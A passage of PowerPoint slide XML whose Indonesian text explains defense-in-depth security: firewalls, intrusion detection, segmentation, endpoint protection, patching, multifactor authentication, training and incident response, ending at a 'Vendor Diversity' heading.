              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Tangguh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>macam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Solusi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> antivirus dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reguler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Vendor</a:t>
            </a:r>
          </a:p>
